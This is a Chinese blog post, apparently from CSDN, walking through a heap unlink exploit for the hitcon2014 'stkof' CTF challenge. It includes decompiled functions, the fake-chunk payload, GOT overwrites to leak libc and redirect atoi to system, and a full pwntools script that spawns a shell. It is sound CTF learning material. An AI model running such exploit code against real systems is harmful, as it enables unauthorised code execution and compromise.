Rookie学堆——Unlink_hitcon2014-stkof

已于 2024-04-09 23:00:00 修改
阅读量291 收藏 6
点赞数 5
文章标签: 安全 经验分享
于 2024-04-09 22:32:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73221723/article/details/137567578
版权

Unlink

1.stkof

在这里插入图片描述

程序分析:

首先根据选项把相应函数定义好:

//alloc():
v4 = __readfsqword(0x28u);
  fgets(s, 16, stdin);
  size = atoll(s); //输入想要的chunk的大小
  v2 = (char *)malloc(size);
  if ( !v2 )
    return 0xFFFFFFFFLL;
  globals[++cnt] = v2; //在global存储chunk地址
  printf("%d\n", (unsigned int)cnt); //打印chunk号,cnt表明第几个chunk
  return 0LL;

//对应的wp函数:
def add(size):
	io.sendline(b'1')
	io.sendline(str(size))
	io.recvuntil('OK\n')

//fill():
  v6 = __readfsqword(0x28u);
  fgets(s, 16, stdin);
  idx = atol(s); //输入想要修改的chunk号
  if ( idx > 0x100000 )
    return 0xFFFFFFFFLL;
  if ( !globals[idx] )
    return 0xFFFFFFFFLL;
  fgets(s, 16, stdin);
  size = atoll(s); //输入将要修改chunk的内容的length,即下面要输入的payload的长度
  ptr = globals[idx]; //将指针指向要修改的chunk
  for ( i = fread(ptr, 1uLL, size, stdin); i > 0; i = fread(ptr, 1uLL, size, stdin) )
  {
    ptr += i;
    size -= i;
  } //输入payload
  if ( size )
    return 0xFFFFFFFFLL;
  else
    return 0LL;

//对应的wp函数
def edit(idx,text):
	io.sendline(b'2')
	io.sendline(str(idx))
	io.sendline(str(len(text)))
	io.send(text)
	io.recvuntil('OK\n')

//free_chunk
  v3 = __readfsqword(0x28u);
  fgets(s, 16, stdin);
  idx = atol(s); //输入想free调第几个chunk
  if ( idx > 0x100000 )
    return 0xFFFFFFFFLL;
  if ( !globals[idx] )
    return 0xFFFFFFFFLL;
  free(globals[idx]); //free掉相应chunk
  globals[idx] = 0LL;  //指针复0
  return 0LL;

//对应的wp函数
def free(idx):
	io.sendline(b'3')
	io.sendline(str(idx))

另外比较重要的就是globals,用于存储各chunk的指针
在这里插入图片描述

保护情况:
checksec

Partial RELRO意味着可劫持got表

首先创建五个chunk:

add(0x20) #chunk1
add(0x40) #chunk2
add(0x30) #chunk3
add(0x80) #chunk4
add(0x30) #chunk5 第五个chunk没必要创建其实

请添加图片描述

此时global(0x602140)地址也存储上了各chunk地址

请添加图片描述

此时使用unlink(使指向某chunk的指针,unlink后指向&chunk-0x18)例如若对chunk3(0x602158)使用即可修改chunk3指针到chunk0–> 0x602140 = chunk3(0x602158 - 0x18),此时若再做edit(chunk3)就可从chunk0(0x602140)开始修改chunk0~5乃至以后的指针地址

具体利用:

chunk0 = 0x602140
chunk3 = 0x602158  #chunk0 + 0x18 
fd = chunk3 - 0x18 # fd + 0x18(p + 0x18 = bk) = chunk3
bk = chunk3 - 0x10 # bk + 0x10(p + 0x10 = fd) = chunk3
payload = p64(0) + p64(0x30) + p64(fd) + p64(bk) + b'a'*0x10 + p64(0x30) + p64(0x90) # build fake_chunk
edit(3,payload)

请添加图片描述

unlink:

free(4)

fake_chunk和chunk4合并请添加图片描述

chunk3指向原chunk3(0x602158) - 0x18​ = 0x602140请添加图片描述

这时我们edit(3,payload):

puts_plt = elf.plt['puts']
puts_got = elf.got['puts'] #0x602020
free_got = elf.got['free'] #0x602018
atoi_got = elf.got['atoi']
payload = b'a'*0x8 + p64(free_got) + p64(puts_got)
#          chunk0        chunk1          chunk2 
edit(3,payload)

请添加图片描述

此时若再edit(chunk1)就是修改free函数got表的内容,我们这里把free函数修改为puts函数

edit(1,p64(puts_plt)) # 将free_got修改为puts_plt
free(2) # 执行puts_plt(puts_got)

再次执行free也就等于调用了puts函数,而2对应指向chunk2,也就是我们已提前修改的puts_got

请添加图片描述

这样就输出了puts_got,也就能泄露出libc基地址以及system等函数

puts_addr = u64(io.recvuntil('\nOK\n', drop=True).ljust(8, b'\x00'))
slog('puts',puts_addr)
libc_base = puts_addr - libc.sym['puts']
slog('libc_base',libc_base)
sys_addr = libc_base + libc.sym['system']

此时我们发现main函数里有atoi(nptr),而npts又是有我们输入的

请添加图片描述

那只需将atoi函数got表的位置修改为system函数再输入/bin/sh,即可得到shell

请添加图片描述

#将chunk1位置修改为atoi_got的地址,再修改atoi_got修改为system函数
payload = b'a'*0x8 + p64(atoi_got)
edit(3,payload)
edit(1,p64(sys_addr))
bin_sh = b'/bin/sh\x00'
io.sendline(bin_sh)

from pwn import *
from ctypes import *
from time import sleep
from LibcSearcher import *
#context(arch = elf.arch,log_level = 'debug',os = 'linux')
context(arch = "amd64",os = "linux",log_level= "debug")
context.terminal = ['tmux', 'splitw', '-h']

file_name = 'pwn'
elf = ELF(file_name)
libc= ELF('./libc.so.6')
#libc= ELF('./libc-2.31.so')

debug = 0
if debug:
	io = remote('xyctf.top', 33611)
else:
	io = process(file_name)
def slog(name, address): print("\033[40;34m[+]\033[40;35m" + name + "==>" +hex(address) + "\033[0m")
# gdb.attach(io,'b *$rebase(0x124e)')

def add(size):
	io.sendline(b'1')
	io.sendline(str(size))
	io.recvuntil('OK\n')

def free(idx):
	io.sendline(b'3')
	io.sendline(str(idx))

def edit(idx,text):
	io.sendline(b'2')
	io.sendline(str(idx))
	io.sendline(str(len(text)))
	io.send(text)
	io.recvuntil('OK\n')

#创建chunk
add(0x20) #chunk1
add(0x40) #chunk2
add(0x30) #chunk3
add(0x80) #chunk4
add(0x30) #chunk5

#unlink
chunk0 = 0x602140
chunk3 = 0x602158  #chunk0 + 0x18 
fd = chunk3 - 0x18 # fd + 0x18(p + 0x18 = bk) = chunk3
bk = chunk3 - 0x10 # bk + 0x10(p + 0x10 = fd) = chunk3
payload = p64(0) + p64(0x30) + p64(fd) + p64(bk) + b'a'*0x10 + p64(0x30) + p64(0x90) # build fake_chunk
edit(3,payload)
free(4)
io.recvuntil('OK\n')

#泄露Libc地址
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
free_got = elf.got['free']
atoi_got = elf.got['atoi']
payload = b'a'*0x8 + p64(free_got) + p64(puts_got)
#          chunk0        chunk1          chunk2 
edit(3,payload)

edit(1,p64(puts_plt)) # 将free_got修改为puts_plt
free(2) # 执行puts_plt(puts_got)

puts_addr = u64(io.recvuntil('\nOK\n', drop=True).ljust(8, b'\x00'))
slog('puts_addr',puts_addr)
libc_base = puts_addr - libc.sym['puts']
slog('libc_base',libc_base)
sys_addr = libc_base + libc.sym['system']

#将chunk1位置修改为atoi_got的地址,再修改atoi_got修改为system函数
payload = b'a'*0x8 + p64(atoi_got)
edit(3,payload)
edit(1,p64(sys_addr))
bin_sh = b'/bin/sh\x00'
io.sendline(bin_sh)
io.interactive()
Ryouri suru
关注
css3_@font-face
03-11
在CSS3中,`@font-face`规则是一个强大的特性,它允许网页设计师在不依赖于用户计算机已安装的字体的情况下,引入自定义字体到网页中。这个特性打破了浏览器对字体的限制,使得网页设计可以拥有更丰富的视觉效果。...
GBDT_regression-master.zip
07-27
梯度提升决策树(Gradient Boosting Decision Tree,GBDT)算法是近年来被提及比较多的一个算法,这主要得益于其算法的性能,以及该算法在各类数据挖掘以及机器学习比赛中的卓越表现。
hitcon2014_stkof
m0_73756460的博客
02-22 172
buu刷题hitcon2014_stkof【wp】
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1747
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
[BUUCTF]-PWN:hitcon2014_stkof解析(unlink
最新发布
2301_79326813的博客
01-28 783
又是一道堆题,先看保护关键信息,64位,没开pie。再看ida大致就是alloc创建堆块,free释放堆块,fill填充堆块内容,以及一个看起来没啥用的函数,当然我也没利用这个函数去解题这里有两种解法。
2014 HITCON——stkof
04-20 230
64位程序,没开PIE  #unlink 程序逻辑 1 __int64 __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 int v3; // eax 4 signed int v5; // [rsp+Ch] [rbp-74h] 5 char nptr; // [rsp+10h] [r...
购物网站_java-web
09-08
【标题】"购物网站_java-web"的项目是一个基于Java Web技术构建的在线购物平台示例,旨在帮助具有一定Java编程基础的学习者深入理解Web应用程序的开发。这个项目将展示如何运用Java技术栈来实现一个功能完备的电子...
Rookie_LearningASPNETCORE
03-29
这个名为"Rookie_LearningASPNETCORE"的学习资源可能是针对初学者设计的,旨在帮助他们掌握ASP.NET Core的基础知识和核心概念。JavaScript作为前端开发的主要语言,与ASP.NET Core在构建全栈应用时起着至关重要的...
rookie_cn-windows 2000 device driver book
04-10
自己看去,是驱动开发的英文资料
hitcon2014_stkof(unsorted bin unlink)
seaaseesa的博客
04-09 825
hitcon2014_stkof 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,edit功能存在溢出。 程序没有show功能。 由于没有开启PIE,got表也可以修改,因此,我们利用unlink控制堆指针为got表,然后修改strlen的got表为puts的plt表,即可实现show的功能,进而泄露glibc地址,后续利用。 #coding:utf8 from ...
HITCON 2014 pwn - stkof 做题笔记
fa1c4的blog
08-30 495
前言 一道unlink + off-by-one, ctfhub 搜 stkof 分析过程 __int64 __fastcall main(int a1, char **a2, char **a3) { int v3; // eax int v5; // [rsp+Ch] [rbp-74h] char nptr[104]; // [rsp+10h] [rbp-70h] BYREF unsigned __int64 v7; // [rsp+78h] [rbp-8h] v7 = __re
linux_pwn(4)--unlink&&hitcon2014_stkof&&hitcontraining_bamboobox
azraelxuemo的博客
03-08 4435
文章目录What is unlinkunsorted bin释放时候的关键源码接下来就是要绕过unlink checkpwn题思路例题保护机制add函数delete函数edit函数开始做题准备框架调试总结 What is unlink unlink其实是unsorted bin在free的时候的一个操作,他的本意其实也是合并空闲的块方便下一次分配,但往往我们可以通过unlink欺骗unsoted bin的空闲块管理链表,产生任意地址写的效果 unsorted bin释放时候的关键源码 else if (!c
[BUUOJ刷题记录]hitcon2014_stkof 一道Unlink例题
zylxixixi的博客
10-01 318
check一下开启的安全防护,并没有开启PIE 拿到题进行IDA反编译,可以看到有四个函数,对应四种操作,逐个分析。 allocate函数创建一个自定义大小的堆 edit函数自定大小修改堆块的内容,容易产生堆溢出 delete函数就是free堆块 还有一个没有意义的函数 这里比较重要的点是存储堆块地址的数组地址 整体思路为: 申请四个堆块,大小分别为0x1000,0x90,0x80,0x10 一般来说题目会使用setbuf来关闭缓冲区,但由于本题并没有采用s...
buuctf hitcon2014_stkof 4/100
m0_57754423的博客
02-28 173
这个题目之前做过,所有这次并没有什么大问题。 unlink exp: from pwn import * from LibcSearcher import * p = remote("node4.buuoj.cn",28398) context.log_level = "debug" context.arch = "amd64" e = ELF("./stkof") # chunk_addr = 0x602140 def add(size): p.sendline(b"1") p.sendl
2014_hitcon_stkof
Maxmalloc的博客
12-13 866
题目链接 这是一道unlink的题,初学者可以通过它入门unlink 先大概了解一下unlink相关的知识点 unlink主要适用于small chunk(>=size>=0x80)和large chunk
[BUUCTF]PWN——hitcon2014_stkof
mcmuyanga的博客
01-18 838
hitcon2014_stkof 附件 步骤: 例行检查,64位程序,开启了canary和nx 本地试运行一下看看大概的情况, 64位ida载入,给程序的函数改了一下名,方便看,这是道堆,不过没有打印菜单 main(),v3=4的那个函数感觉没什么用,就不截图了 add() del() edit() 利用点在edit() 它向存储在s[v2]的这个数组中的指针开始的地址读入n数个字符(n由我们输入,可以溢出),也就是说,只要我们能够修改s[v2]中存的指针,就可以实现任意地址写。程序没有开启r
2014 HITCON CTF stkof
Bill
03-16 2940
2014 HITCON CTF stkof 1.序言 接着how2heap的教程走,下面是unlink漏洞的利用及相关练习。 有关漏洞的原理,网上已经有很多说明了,在这里我给出一些比较靠谱一点的链接: CTF WiKi 堆溢出之unlink的利用-Yun Unlink Exploit Linux堆溢出漏洞利用之unlink 堆溢出的unlink利用方法 2.程序分析 ...
学习资料:makefile 简介与示例 - 陈皓
本文主要介绍了关于make file的学习资料,其中包括了一个网页链接和一本PDF书籍。...PDF书籍的名称为《跟我一起写Makefile》(PDF 重制版),作者为陈皓,出版日期为2021年02月06日。 在本文中,我们将重点关注make ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值